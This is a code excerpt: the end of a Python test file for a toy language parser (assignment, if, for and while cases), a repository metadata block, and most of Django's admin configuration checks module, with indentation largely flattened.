case4_assgn.add(case4_assgnmul)
case4 = case4_assgn
case5_assgn = ast.Assignment("a")
case5_assgndiv = ast.Operation("/")
case5_assgndiv.add(ast.Identifier("a"))
case5_assgndiv.add(ast.Literal(env.Value(env.NULL)))
case5_assgn.add(case5_assgndiv)
case5 = case5_assgn
case6_assgn = ast.Assignment("a")
case6_assgnpow = ast.Operation("^")
case6_assgnpow.add(ast.Identifier("a"))
case6_assgnpow.add(ast.Literal(env.Value(env.NULL)))
case6_assgn.add(case6_assgnpow)
case6 = case6_assgn
case7_assgn = ast.Assignment("a")
case7_assgnmod = ast.Operation("%")
case7_assgnmod.add(ast.Identifier("a"))
case7_assgnmod.add(ast.Literal(env.Value(env.NULL)))
case7_assgn.add(case7_assgnmod)
case7 = case7_assgn
cases = [
("a = a", case1, 2),
("a += null", case2, 2),
("a = a + null", case2, 4),
("a -= null", case3, 2),
("a = a - null", case3, 4),
("a *= null", case4, 2),
("a = a * null", case4, 4),
("a /= null", case5, 2),
("a = a / null", case5, 4),
("a ^= null", case6, 2),
("a = a ^ null", case6, 4),
]
for tc in cases:
output, offset = generate_assignment(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("a =", ParseException),
("a", ParseException),
("= 2", ParseException),
("a == 2", ParseException),
("a = = 2", ParseException),
("a ; = 2", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_assignment, clean_lex(tc[0]))
def test_function(self):
pass
def test_if(self):
# case 1: if (null) {;}, offset 6
case1 = ast.Branch()
case1_cond = ast.Conditional()
case1_cond.add(ast.Literal(env.Value(env.NULL)))
case1_cond.add(ast.Sequence())
case1.add(case1_cond)
# case 2: if (null) {;} else {;}, offset 10
case2 = ast.Branch()
case2_cond = ast.Conditional()
case2_cond.add(ast.Literal(env.Value(env.NULL)))
case2_cond.add(ast.Sequence())
case2.add(case2_cond)
case2.add(ast.Sequence())
# case 3: if (null) {;} else if (null) {;}, offset 14
case3 = ast.Branch()
case3_if = ast.Conditional()
case3_if.add(ast.Literal(env.Value(env.NULL)))
case3_if.add(ast.Sequence())
case3_elif = ast.Branch()
case3_elif_cond = ast.Conditional()
case3_elif_cond.add(ast.Literal(env.Value(env.NULL)))
case3_elif_cond.add(ast.Sequence())
case3_elif.add(case3_elif_cond)
case3.add(case3_if)
case3.add(case3_elif)
# case 4: if (null) {;} else if (null) {;} else {;}, offset 18
case4 = ast.Branch()
case4_if = ast.Conditional()
case4_if.add(ast.Literal(env.Value(env.NULL)))
case4_if.add(ast.Sequence())
case4_elif = ast.Branch()
case4_elif_cond = ast.Conditional()
case4_elif_cond.add(ast.Literal(env.Value(env.NULL)))
case4_elif_cond.add(ast.Sequence())
case4_elif.add(case4_elif_cond)
case4_elif.add(ast.Sequence())
case4.add(case4_if)
case4.add(case4_elif)
cases = [
("if (null) {;}", case1, 6),
("if (null) {;} else {;}", case2, 10),
("if (null) {;} else if (null) {;}", case3, 14),
("if (null) {;} else if (null) {;} else {;}", case4, 18)
]
for tc in cases:
output, offset = generate_if(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("if () {}", ParseException),
("if {} else ()", ParseException),
("if () else if {}", ParseException),
]
for tc in error_cases:
tokens = clean_lex(tc[0])
self.assertRaises(tc[1], generate_if, tokens)
def test_for(self):
        # case 1: for (var a: int = 0; a < 100; a += 1) {;}, offset 19
case1 = ast.Sequence()
case1_init, _ = generate_declaration(clean_lex("var a: int = 0"))
case1_init_base = ast.Sequence()
case1_init_base.add(case1_init)
case1.add(case1_init_base)
case1_cond, _ = generate_expression(clean_lex("a < 100"))
case1_iter, _ = generate_sequence(clean_lex("a += 1"))
case1_body = ast.Sequence()
case1_body.add(ast.Sequence())
case1_body.add(case1_iter)
case1_loop = ast.Loop()
case1_loop.add(case1_cond)
case1_loop.add(case1_body)
case1.add(case1_loop)
# case 2: for (a = 0; true; ) {;}, offset 11
case2 = ast.Sequence()
case2_init, _ = generate_assignment(clean_lex("a = 0"))
case2_init_base = ast.Sequence()
case2_init_base.add(case2_init)
case2.add(case2_init_base)
case2_cond, _ = generate_expression(clean_lex("true"))
case2_iter = ast.Sequence()
case2_body = ast.Sequence()
case2_body.add(ast.Sequence())
case2_body.add(case2_iter)
case2_loop = ast.Loop()
case2_loop.add(case2_cond)
case2_loop.add(case2_body)
case2.add(case2_loop)
# case 3: for (; true; ) {;}, 8
case3 = ast.Sequence()
case3_init = ast.Sequence()
case3.add(case3_init)
case3_cond, _ = generate_expression(clean_lex("true"))
case3_body = ast.Sequence()
case3_body.add(ast.Sequence())
case3_body.add(ast.Sequence())
case3_loop = ast.Loop()
case3_loop.add(case3_cond)
case3_loop.add(case3_body)
case3.add(case3_loop)
cases = [
("for (var a: int = 0; a < 100; a += 1) {;}", case1, 19),
("for (a = 0; true; ) {;}", case2, 11),
("for (; true; ) {;}", case3, 8),
]
for tc in cases:
output, offset = generate_for(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("for ; true; a < 100; {;}", ParseException),
("for (true) {;}", ParseException),
("true;", ParseException),
("for {true; ; } (false);", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_for, clean_lex(tc[0]))
def test_while(self):
# case 1: while (null) {}
case1 = ast.Loop()
case1.add(ast.Literal(env.Value(env.NULL)))
case1.add(ast.Sequence())
cases = [
("while (null) {}", case1, 5),
("while (null) {;}", case1, 6),
]
for tc in cases:
output, offset = generate_while(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("while () {}", ParseException),
("while ()", ParseException),
("() {}", ParseException),
("while () {}", ParseException),
("while (false) {", ParseException),
("while ) {}}}", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_while, clean_lex(tc[0]))
def test_sequence(self):
pass
def test_optimize(self):
pass
def test_generate(self):
pass
| {
"content_hash": "2d3cb37d7f89ac480b7299798f914eec",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 111,
"avg_line_length": 35.60740740740741,
"alnum_prop": 0.5252756396921157,
"repo_name": "lnsp/tea",
"id": "551e8bac6e2bb354f266a1d013ea38e6be1e6fff",
"size": "19232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtime/test_parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "25"
},
{
"name": "Python",
"bytes": "88546"
},
{
"name": "Shell",
"bytes": "28"
},
{
"name": "Tea",
"bytes": "117"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.contrib.admin.utils import (
NotRelationField, flatten, get_fields_from_path,
)
from django.core import checks
from django.core.exceptions import FieldDoesNotExist
from django.db import models
from django.forms.models import (
BaseModelForm, BaseModelFormSet, _get_foreign_key,
)
from django.template.engine import Engine
def check_admin_app(**kwargs):
from django.contrib.admin.sites import system_check_errors
return system_check_errors
def check_dependencies(**kwargs):
"""
Check that the admin's dependencies are correctly installed.
"""
errors = []
# contrib.contenttypes must be installed.
if not apps.is_installed('django.contrib.contenttypes'):
missing_app = checks.Error(
"'django.contrib.contenttypes' must be in INSTALLED_APPS in order "
"to use the admin application.",
id="admin.E401",
)
errors.append(missing_app)
# The auth context processor must be installed if using the default
# authentication backend.
try:
default_template_engine = Engine.get_default()
except Exception:
# Skip this non-critical check:
# 1. if the user has a non-trivial TEMPLATES setting and Django
# can't find a default template engine
# 2. if anything goes wrong while loading template engines, in
# order to avoid raising an exception from a confusing location
# Catching ImproperlyConfigured suffices for 1. but 2. requires
# catching all exceptions.
pass
else:
if ('django.contrib.auth.context_processors.auth'
not in default_template_engine.context_processors
and 'django.contrib.auth.backends.ModelBackend'
in settings.AUTHENTICATION_BACKENDS):
missing_template = checks.Error(
"'django.contrib.auth.context_processors.auth' must be in "
"TEMPLATES in order to use the admin application.",
id="admin.E402"
)
errors.append(missing_template)
return errors
class BaseModelAdminChecks(object):
def check(self, admin_obj, **kwargs):
errors = []
errors.extend(self._check_raw_id_fields(admin_obj))
errors.extend(self._check_fields(admin_obj))
errors.extend(self._check_fieldsets(admin_obj))
errors.extend(self._check_exclude(admin_obj))
errors.extend(self._check_form(admin_obj))
errors.extend(self._check_filter_vertical(admin_obj))
errors.extend(self._check_filter_horizontal(admin_obj))
errors.extend(self._check_radio_fields(admin_obj))
errors.extend(self._check_prepopulated_fields(admin_obj))
errors.extend(self._check_view_on_site_url(admin_obj))
errors.extend(self._check_ordering(admin_obj))
errors.extend(self._check_readonly_fields(admin_obj))
return errors
def _check_raw_id_fields(self, obj):
""" Check that `raw_id_fields` only contains field names that are listed
on the model. """
if not isinstance(obj.raw_id_fields, (list, tuple)):
return must_be('a list or tuple', option='raw_id_fields', obj=obj, id='admin.E001')
else:
return list(chain(*[
self._check_raw_id_fields_item(obj, obj.model, field_name, 'raw_id_fields[%d]' % index)
for index, field_name in enumerate(obj.raw_id_fields)
]))
def _check_raw_id_fields_item(self, obj, model, field_name, label):
""" Check an item of `raw_id_fields`, i.e. check that field named
`field_name` exists in model `model` and is a ForeignKey or a
ManyToManyField. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E002')
else:
if not isinstance(field, (models.ForeignKey, models.ManyToManyField)):
return must_be('a ForeignKey or ManyToManyField',
option=label, obj=obj, id='admin.E003')
else:
return []
def _check_fields(self, obj):
""" Check that `fields` only refer to existing fields, doesn't contain
duplicates. Check if at most one of `fields` and `fieldsets` is defined.
"""
if obj.fields is None:
return []
elif not isinstance(obj.fields, (list, tuple)):
return must_be('a list or tuple', option='fields', obj=obj, id='admin.E004')
elif obj.fieldsets:
return [
checks.Error(
"Both 'fieldsets' and 'fields' are specified.",
hint=None,
obj=obj.__class__,
id='admin.E005',
)
]
fields = flatten(obj.fields)
if len(fields) != len(set(fields)):
return [
checks.Error(
"The value of 'fields' contains duplicate field(s).",
hint=None,
obj=obj.__class__,
id='admin.E006',
)
]
return list(chain(*[
self._check_field_spec(obj, obj.model, field_name, 'fields')
for field_name in obj.fields
]))
def _check_fieldsets(self, obj):
""" Check that fieldsets is properly formatted and doesn't contain
duplicates. """
if obj.fieldsets is None:
return []
elif not isinstance(obj.fieldsets, (list, tuple)):
return must_be('a list or tuple', option='fieldsets', obj=obj, id='admin.E007')
else:
return list(chain(*[
self._check_fieldsets_item(obj, obj.model, fieldset, 'fieldsets[%d]' % index)
for index, fieldset in enumerate(obj.fieldsets)
]))
def _check_fieldsets_item(self, obj, model, fieldset, label):
""" Check an item of `fieldsets`, i.e. check that this is a pair of a
set name and a dictionary containing "fields" key. """
if not isinstance(fieldset, (list, tuple)):
return must_be('a list or tuple', option=label, obj=obj, id='admin.E008')
elif len(fieldset) != 2:
return must_be('of length 2', option=label, obj=obj, id='admin.E009')
elif not isinstance(fieldset[1], dict):
return must_be('a dictionary', option='%s[1]' % label, obj=obj, id='admin.E010')
elif 'fields' not in fieldset[1]:
return [
checks.Error(
"The value of '%s[1]' must contain the key 'fields'." % label,
hint=None,
obj=obj.__class__,
id='admin.E011',
)
]
elif not isinstance(fieldset[1]['fields'], (list, tuple)):
return must_be('a list or tuple', option="%s[1]['fields']" % label, obj=obj, id='admin.E008')
fields = flatten(fieldset[1]['fields'])
if len(fields) != len(set(fields)):
return [
checks.Error(
"There are duplicate field(s) in '%s[1]'." % label,
hint=None,
obj=obj.__class__,
id='admin.E012',
)
]
return list(chain(*[
self._check_field_spec(obj, model, fieldset_fields, '%s[1]["fields"]' % label)
for fieldset_fields in fieldset[1]['fields']
]))
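    # Illustrative example (not part of Django itself; field names are made up):
    # a `fieldsets` value that satisfies the checks above -- a list of
    # (name, options) pairs whose options dict has a "fields" key and no
    # duplicate field names:
    #
    #     fieldsets = [
    #         ("Identity", {"fields": ["first_name", "last_name"]}),
    #         ("Contact", {"fields": [("email", "phone")]}),
    #     ]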
def _check_field_spec(self, obj, model, fields, label):
""" `fields` should be an item of `fields` or an item of
fieldset[1]['fields'] for any `fieldset` in `fieldsets`. It should be a
field name or a tuple of field names. """
if isinstance(fields, tuple):
return list(chain(*[
self._check_field_spec_item(obj, model, field_name, "%s[%d]" % (label, index))
for index, field_name in enumerate(fields)
]))
else:
return self._check_field_spec_item(obj, model, fields, label)
def _check_field_spec_item(self, obj, model, field_name, label):
if field_name in obj.readonly_fields:
# Stuff can be put in fields that isn't actually a model field if
# it's in readonly_fields, readonly_fields will handle the
# validation of such things.
return []
else:
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
# If we can't find a field on the model that matches, it could
# be an extra field on the form.
return []
else:
if (isinstance(field, models.ManyToManyField) and
not field.remote_field.through._meta.auto_created):
return [
checks.Error(
("The value of '%s' cannot include the ManyToManyField '%s', "
"because that field manually specifies a relationship model.")
% (label, field_name),
hint=None,
obj=obj.__class__,
id='admin.E013',
)
]
else:
return []
def _check_exclude(self, obj):
""" Check that exclude is a sequence without duplicates. """
if obj.exclude is None: # default value is None
return []
elif not isinstance(obj.exclude, (list, tuple)):
return must_be('a list or tuple', option='exclude', obj=obj, id='admin.E014')
elif len(obj.exclude) > len(set(obj.exclude)):
return [
checks.Error(
"The value of 'exclude' contains duplicate field(s).",
hint=None,
obj=obj.__class__,
id='admin.E015',
)
]
else:
return []
def _check_form(self, obj):
""" Check that form subclasses BaseModelForm. """
if hasattr(obj, 'form') and not issubclass(obj.form, BaseModelForm):
return must_inherit_from(parent='BaseModelForm', option='form',
obj=obj, id='admin.E016')
else:
return []
def _check_filter_vertical(self, obj):
""" Check that filter_vertical is a sequence of field names. """
if not hasattr(obj, 'filter_vertical'):
return []
elif not isinstance(obj.filter_vertical, (list, tuple)):
return must_be('a list or tuple', option='filter_vertical', obj=obj, id='admin.E017')
else:
return list(chain(*[
self._check_filter_item(obj, obj.model, field_name, "filter_vertical[%d]" % index)
for index, field_name in enumerate(obj.filter_vertical)
]))
def _check_filter_horizontal(self, obj):
""" Check that filter_horizontal is a sequence of field names. """
if not hasattr(obj, 'filter_horizontal'):
return []
elif not isinstance(obj.filter_horizontal, (list, tuple)):
return must_be('a list or tuple', option='filter_horizontal', obj=obj, id='admin.E018')
else:
return list(chain(*[
self._check_filter_item(obj, obj.model, field_name, "filter_horizontal[%d]" % index)
for index, field_name in enumerate(obj.filter_horizontal)
]))
def _check_filter_item(self, obj, model, field_name, label):
""" Check one item of `filter_vertical` or `filter_horizontal`, i.e.
check that given field exists and is a ManyToManyField. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E019')
else:
if not isinstance(field, models.ManyToManyField):
return must_be('a ManyToManyField', option=label, obj=obj, id='admin.E020')
else:
return []
def _check_radio_fields(self, obj):
""" Check that `radio_fields` is a dictionary. """
if not hasattr(obj, 'radio_fields'):
return []
elif not isinstance(obj.radio_fields, dict):
return must_be('a dictionary', option='radio_fields', obj=obj, id='admin.E021')
else:
return list(chain(*[
self._check_radio_fields_key(obj, obj.model, field_name, 'radio_fields') +
self._check_radio_fields_value(obj, val, 'radio_fields["%s"]' % field_name)
for field_name, val in obj.radio_fields.items()
]))
def _check_radio_fields_key(self, obj, model, field_name, label):
""" Check that a key of `radio_fields` dictionary is name of existing
field and that the field is a ForeignKey or has `choices` defined. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E022')
else:
if not (isinstance(field, models.ForeignKey) or field.choices):
return [
checks.Error(
"The value of '%s' refers to '%s', which is not an "
"instance of ForeignKey, and does not have a 'choices' definition." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E023',
)
]
else:
return []
def _check_radio_fields_value(self, obj, val, label):
""" Check type of a value of `radio_fields` dictionary. """
from django.contrib.admin.options import HORIZONTAL, VERTICAL
if val not in (HORIZONTAL, VERTICAL):
return [
checks.Error(
"The value of '%s' must be either admin.HORIZONTAL or admin.VERTICAL." % label,
hint=None,
obj=obj.__class__,
id='admin.E024',
)
]
else:
return []
def _check_view_on_site_url(self, obj):
if hasattr(obj, 'view_on_site'):
if not callable(obj.view_on_site) and not isinstance(obj.view_on_site, bool):
return [
checks.Error(
"The value of 'view_on_site' must be a callable or a boolean value.",
hint=None,
obj=obj.__class__,
id='admin.E025',
)
]
else:
return []
else:
return []
def _check_prepopulated_fields(self, obj):
""" Check that `prepopulated_fields` is a dictionary containing allowed
field types. """
if not hasattr(obj, 'prepopulated_fields'):
return []
elif not isinstance(obj.prepopulated_fields, dict):
return must_be('a dictionary', option='prepopulated_fields', obj=obj, id='admin.E026')
else:
return list(chain(*[
self._check_prepopulated_fields_key(obj, obj.model, field_name, 'prepopulated_fields') +
self._check_prepopulated_fields_value(obj, obj.model, val, 'prepopulated_fields["%s"]' % field_name)
for field_name, val in obj.prepopulated_fields.items()
]))
def _check_prepopulated_fields_key(self, obj, model, field_name, label):
""" Check a key of `prepopulated_fields` dictionary, i.e. check that it
is a name of existing field and the field is one of the allowed types.
"""
forbidden_field_types = (
models.DateTimeField,
models.ForeignKey,
models.ManyToManyField
)
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E027')
else:
if isinstance(field, forbidden_field_types):
return [
checks.Error(
"The value of '%s' refers to '%s', which must not be a DateTimeField, "
"ForeignKey or ManyToManyField." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E028',
)
]
else:
return []
def _check_prepopulated_fields_value(self, obj, model, val, label):
""" Check a value of `prepopulated_fields` dictionary, i.e. it's an
iterable of existing fields. """
if not isinstance(val, (list, tuple)):
return must_be('a list or tuple', option=label, obj=obj, id='admin.E029')
else:
return list(chain(*[
self._check_prepopulated_fields_value_item(obj, model, subfield_name, "%s[%r]" % (label, index))
for index, subfield_name in enumerate(val)
]))
def _check_prepopulated_fields_value_item(self, obj, model, field_name, label):
""" For `prepopulated_fields` equal to {"slug": ("title",)},
`field_name` is "title". """
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E030')
else:
return []
def _check_ordering(self, obj):
""" Check that ordering refers to existing fields or is random. """
# ordering = None
if obj.ordering is None: # The default value is None
return []
elif not isinstance(obj.ordering, (list, tuple)):
return must_be('a list or tuple', option='ordering', obj=obj, id='admin.E031')
else:
return list(chain(*[
self._check_ordering_item(obj, obj.model, field_name, 'ordering[%d]' % index)
for index, field_name in enumerate(obj.ordering)
]))
def _check_ordering_item(self, obj, model, field_name, label):
""" Check that `ordering` refers to existing fields. """
if field_name == '?' and len(obj.ordering) != 1:
return [
checks.Error(
("The value of 'ordering' has the random ordering marker '?', "
"but contains other fields as well."),
hint='Either remove the "?", or remove the other fields.',
obj=obj.__class__,
id='admin.E032',
)
]
elif field_name == '?':
return []
elif '__' in field_name:
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
return []
else:
if field_name.startswith('-'):
field_name = field_name[1:]
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E033')
else:
return []
def _check_readonly_fields(self, obj):
""" Check that readonly_fields refers to proper attribute or field. """
if obj.readonly_fields == ():
return []
elif not isinstance(obj.readonly_fields, (list, tuple)):
return must_be('a list or tuple', option='readonly_fields', obj=obj, id='admin.E034')
else:
return list(chain(*[
self._check_readonly_fields_item(obj, obj.model, field_name, "readonly_fields[%d]" % index)
for index, field_name in enumerate(obj.readonly_fields)
]))
def _check_readonly_fields_item(self, obj, model, field_name, label):
if callable(field_name):
return []
elif hasattr(obj, field_name):
return []
elif hasattr(model, field_name):
return []
else:
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return [
checks.Error(
"The value of '%s' is not a callable, an attribute of '%s', or an attribute of '%s.%s'." % (
label, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E035',
)
]
else:
return []
class ModelAdminChecks(BaseModelAdminChecks):
def check(self, admin_obj, **kwargs):
errors = super(ModelAdminChecks, self).check(admin_obj)
errors.extend(self._check_save_as(admin_obj))
errors.extend(self._check_save_on_top(admin_obj))
errors.extend(self._check_inlines(admin_obj))
errors.extend(self._check_list_display(admin_obj))
errors.extend(self._check_list_display_links(admin_obj))
errors.extend(self._check_list_filter(admin_obj))
errors.extend(self._check_list_select_related(admin_obj))
errors.extend(self._check_list_per_page(admin_obj))
errors.extend(self._check_list_max_show_all(admin_obj))
errors.extend(self._check_list_editable(admin_obj))
errors.extend(self._check_search_fields(admin_obj))
errors.extend(self._check_date_hierarchy(admin_obj))
return errors
def _check_save_as(self, obj):
""" Check save_as is a boolean. """
if not isinstance(obj.save_as, bool):
return must_be('a boolean', option='save_as',
obj=obj, id='admin.E101')
else:
return []
def _check_save_on_top(self, obj):
""" Check save_on_top is a boolean. """
if not isinstance(obj.save_on_top, bool):
return must_be('a boolean', option='save_on_top',
obj=obj, id='admin.E102')
else:
return []
def _check_inlines(self, obj):
""" Check all inline model admin classes. """
if not isinstance(obj.inlines, (list, tuple)):
return must_be('a list or tuple', option='inlines', obj=obj, id='admin.E103')
else:
return list(chain(*[
self._check_inlines_item(obj, obj.model, item, "inlines[%d]" % index)
for index, item in enumerate(obj.inlines)
]))
def _check_inlines_item(self, obj, model, inline, label):
""" Check one inline model admin. """
inline_label = '.'.join([inline.__module__, inline.__name__])
from django.contrib.admin.options import BaseModelAdmin
if not issubclass(inline, BaseModelAdmin):
return [
checks.Error(
"'%s' must inherit from 'BaseModelAdmin'." % inline_label,
hint=None,
obj=obj.__class__,
id='admin.E104',
)
]
elif not inline.model:
return [
checks.Error(
"'%s' must have a 'model' attribute." % inline_label,
hint=None,
obj=obj.__class__,
id='admin.E105',
)
]
elif not issubclass(inline.model, models.Model):
return must_be('a Model', option='%s.model' % inline_label,
obj=obj, id='admin.E106')
else:
return inline(model, obj.admin_site).check()
def _check_list_display(self, obj):
""" Check that list_display only contains fields or usable attributes.
"""
if not isinstance(obj.list_display, (list, tuple)):
return must_be('a list or tuple', option='list_display', obj=obj, id='admin.E107')
else:
return list(chain(*[
self._check_list_display_item(obj, obj.model, item, "list_display[%d]" % index)
for index, item in enumerate(obj.list_display)
]))
def _check_list_display_item(self, obj, model, item, label):
if callable(item):
return []
elif hasattr(obj, item):
return []
elif hasattr(model, item):
# getattr(model, item) could be an X_RelatedObjectsDescriptor
try:
field = model._meta.get_field(item)
except FieldDoesNotExist:
try:
field = getattr(model, item)
except AttributeError:
field = None
if field is None:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not a "
"callable, an attribute of '%s', or an attribute or method on '%s.%s'." % (
label, item, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E108',
)
]
elif isinstance(field, models.ManyToManyField):
return [
checks.Error(
"The value of '%s' must not be a ManyToManyField." % label,
hint=None,
obj=obj.__class__,
id='admin.E109',
)
]
else:
return []
else:
try:
model._meta.get_field(item)
except FieldDoesNotExist:
return [
# This is a deliberate repeat of E108; there's more than one path
# required to test this condition.
checks.Error(
"The value of '%s' refers to '%s', which is not a callable, "
"an attribute of '%s', or an attribute or method on '%s.%s'." % (
label, item, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E108',
)
]
else:
return []
def _check_list_display_links(self, obj):
""" Check that list_display_links is a unique subset of list_display.
"""
if obj.list_display_links is None:
return []
elif not isinstance(obj.list_display_links, (list, tuple)):
return must_be('a list, a tuple, or None', option='list_display_links', obj=obj, id='admin.E110')
else:
return list(chain(*[
self._check_list_display_links_item(obj, field_name, "list_display_links[%d]" % index)
for index, field_name in enumerate(obj.list_display_links)
]))
def _check_list_display_links_item(self, obj, field_name, label):
if field_name not in obj.list_display:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not defined in 'list_display'." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E111',
)
]
else:
return []
def _check_list_filter(self, obj):
if not isinstance(obj.list_filter, (list, tuple)):
return must_be('a list or tuple', option='list_filter', obj=obj, id='admin.E112')
else:
return list(chain(*[
self._check_list_filter_item(obj, obj.model, item, "list_filter[%d]" % index)
for index, item in enumerate(obj.list_filter)
]))
def _check_list_filter_item(self, obj, model, item, label):
"""
Check one item of `list_filter`, i.e. check if it is one of three options:
1. 'field' -- a basic field filter, possibly w/ relationships (e.g.
'field__rel')
2. ('field', SomeFieldListFilter) - a field-based list filter class
3. SomeListFilter - a non-field list filter class
"""
from django.contrib.admin import ListFilter, FieldListFilter
if callable(item) and not isinstance(item, models.Field):
# If item is option 3, it should be a ListFilter...
if not issubclass(item, ListFilter):
return must_inherit_from(parent='ListFilter', option=label,
obj=obj, id='admin.E113')
# ... but not a FieldListFilter.
elif issubclass(item, FieldListFilter):
return [
checks.Error(
"The value of '%s' must not inherit from 'FieldListFilter'." % label,
hint=None,
obj=obj.__class__,
id='admin.E114',
)
]
else:
return []
elif isinstance(item, (tuple, list)):
# item is option #2
field, list_filter_class = item
if not issubclass(list_filter_class, FieldListFilter):
return must_inherit_from(parent='FieldListFilter', option='%s[1]' % label,
obj=obj, id='admin.E115')
else:
return []
else:
# item is option #1
field = item
# Validate the field string
try:
get_fields_from_path(model, field)
except (NotRelationField, FieldDoesNotExist):
return [
checks.Error(
"The value of '%s' refers to '%s', which does not refer to a Field." % (label, field),
hint=None,
obj=obj.__class__,
id='admin.E116',
)
]
else:
return []
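    # Illustrative examples of the three accepted `list_filter` forms described
    # above (the field and filter names here are hypothetical, not taken from
    # any real model):
    #   list_filter = ['pub_date']                                   # option 1
    #   list_filter = [('author', admin.RelatedFieldListFilter)]     # option 2
    #   list_filter = [SomeCustomListFilter]                         # option 3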
def _check_list_select_related(self, obj):
""" Check that list_select_related is a boolean, a list or a tuple. """
if not isinstance(obj.list_select_related, (bool, list, tuple)):
return must_be('a boolean, tuple or list', option='list_select_related',
obj=obj, id='admin.E117')
else:
return []
def _check_list_per_page(self, obj):
""" Check that list_per_page is an integer. """
if not isinstance(obj.list_per_page, int):
return must_be('an integer', option='list_per_page', obj=obj, id='admin.E118')
else:
return []
def _check_list_max_show_all(self, obj):
""" Check that list_max_show_all is an integer. """
if not isinstance(obj.list_max_show_all, int):
return must_be('an integer', option='list_max_show_all', obj=obj, id='admin.E119')
else:
return []
def _check_list_editable(self, obj):
""" Check that list_editable is a sequence of editable fields from
list_display without first element. """
if not isinstance(obj.list_editable, (list, tuple)):
return must_be('a list or tuple', option='list_editable', obj=obj, id='admin.E120')
else:
return list(chain(*[
self._check_list_editable_item(obj, obj.model, item, "list_editable[%d]" % index)
for index, item in enumerate(obj.list_editable)
]))
def _check_list_editable_item(self, obj, model, field_name, label):
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E121')
else:
if field_name not in obj.list_display:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not "
"contained in 'list_display'." % (label, field_name),
hint=None,
obj=obj.__class__,
id='admin.E122',
)
]
elif obj.list_display_links and field_name in obj.list_display_links:
return [
checks.Error(
"The value of '%s' cannot be in both 'list_editable' and 'list_display_links'." % field_name,
hint=None,
obj=obj.__class__,
id='admin.E123',
)
]
# Check that list_display_links is set, and that the first values of list_editable and list_display are
# not the same. See ticket #22792 for the use case relating to this.
elif (obj.list_display[0] in obj.list_editable and obj.list_display[0] != obj.list_editable[0] and
obj.list_display_links is not None):
return [
checks.Error(
"The value of '%s' refers to the first field in 'list_display' ('%s'), "
"which cannot be used unless 'list_display_links' is set." % (
label, obj.list_display[0]
),
hint=None,
obj=obj.__class__,
id='admin.E124',
)
]
elif not field.editable:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not editable through the admin." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E125',
)
]
else:
return []
def _check_search_fields(self, obj):
""" Check search_fields is a sequence. """
if not isinstance(obj.search_fields, (list, tuple)):
return must_be('a list or tuple', option='search_fields', obj=obj, id='admin.E126')
else:
return []
def _check_date_hierarchy(self, obj):
""" Check that date_hierarchy refers to DateField or DateTimeField. """
if obj.date_hierarchy is None:
return []
else:
try:
field = obj.model._meta.get_field(obj.date_hierarchy)
except FieldDoesNotExist:
return refer_to_missing_field(option='date_hierarchy',
field=obj.date_hierarchy,
model=obj.model, obj=obj, id='admin.E127')
else:
if not isinstance(field, (models.DateField, models.DateTimeField)):
return must_be('a DateField or DateTimeField', option='date_hierarchy',
obj=obj, id='admin.E128')
else:
return []
class InlineModelAdminChecks(BaseModelAdminChecks):
def check(self, inline_obj, **kwargs):
errors = super(InlineModelAdminChecks, self).check(inline_obj)
parent_model = inline_obj.parent_model
errors.extend(self._check_relation(inline_obj, parent_model))
errors.extend(self._check_exclude_of_parent_model(inline_obj, parent_model))
errors.extend(self._check_extra(inline_obj))
errors.extend(self._check_max_num(inline_obj))
errors.extend(self._check_min_num(inline_obj))
errors.extend(self._check_formset(inline_obj))
return errors
